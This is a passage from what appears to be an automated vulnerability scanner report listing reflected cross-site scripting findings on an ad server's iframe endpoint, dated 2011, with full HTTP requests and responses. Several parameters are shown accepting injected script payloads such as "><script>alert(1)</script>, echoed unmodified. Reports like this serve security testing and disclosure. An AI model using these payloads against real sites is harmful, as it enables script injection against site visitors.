AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:55 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNKDAAAAABMBArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8flg7HoVyhy11AAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:55 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href=\"http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&bf115";alert(1)//760f2f14d5b=1http://ad.agkn.com/interaction!che=1802253544?imid=6357708857464532341&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se ...[SNIP]...
2.6. http://ad.agkn.com/iframe!t=1129! [redirect parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1129!
Issue detail
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5340"><script>alert(1)</script>140300babcc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=e5340"><script>alert(1)</script>140300babcc HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNKCAAAAAA8BArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8flJrtfJ6qWCjAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=e5340"><script>alert(1)</script>140300babcchttp://ad.agkn.com/interaction!che=392546480?imid=5939040586662764707&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi ...[SNIP]...
2.7. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1131!
Issue detail
The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81d44"><script>alert(1)</script>6ee1469f996 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=34427248279872173381d44"><script>alert(1)</script>6ee1469f996&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:04 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNJQAAAAAAwBArwBATUBC%2FEB0AADAUIBBoABQwEGgAFBAQaAAQK8fnjlj%2BuxPLfUAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:04 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href="http://pixel.mathtag.com/click/img?mt_aid=34427248279872173381d44"><script>alert(1)</script>6ee1469f996&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1603187548?imid=8711527296671725524&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Con ...[SNIP]...
2.8. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1131!
Issue detail
The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db7ef"><script>alert(1)</script>a402f89f56b was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060db7ef"><script>alert(1)</script>a402f89f56b&redirect= HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:05 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNJRAAAAABABArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjT3r%2FI4Pw%2BjAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:05 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060db7ef"><script>alert(1)</script>a402f89f56b&redirect=http://ad.agkn.com/interaction!che=1794660149?imid=3816712664080388003&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Produc ...[SNIP]...
2.9. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1131!
Issue detail
The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88dd2"><script>alert(1)</script>488066488aa was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=12641388dd2"><script>alert(1)</script>488066488aa&mt_adid=101060&redirect= HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:04 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNJQAAAAAA4BArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjzlQUQ4QovRAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:04 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=12641388dd2"><script>alert(1)</script>488066488aa&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1106824953?imid=4387985173199883217&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/ ...[SNIP]...
2.10. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1131!
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 372d8"%3balert(1)//04ade7f7217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372d8";alert(1)//04ade7f7217 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&372d8"%3balert(1)//04ade7f7217=1 HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:08 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNJUAAAAABYBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fkadB%2FcIop4dAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:08 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href=\"http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&372d8";alert(1)//04ade7f7217=1http://ad.agkn.com/interaction!che=1298692797?imid=5088231911581720093&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se ...[SNIP]...
2.11. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1131!
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f604e"><script>alert(1)</script>3e78bbef9e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&f604e"><script>alert(1)</script>3e78bbef9e2=1 HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:07 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNJTAAAAABQBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjtIPx4EjM5IAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:07 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&f604e"><script>alert(1)</script>3e78bbef9e2=1http://ad.agkn.com/interaction!che=441258755?imid=4271733644718820936&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Ser ...[SNIP]...
2.12. http://ad.agkn.com/iframe!t=1131! [redirect parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1131!
Issue detail
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5798"><script>alert(1)</script>bbf67718b2e was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
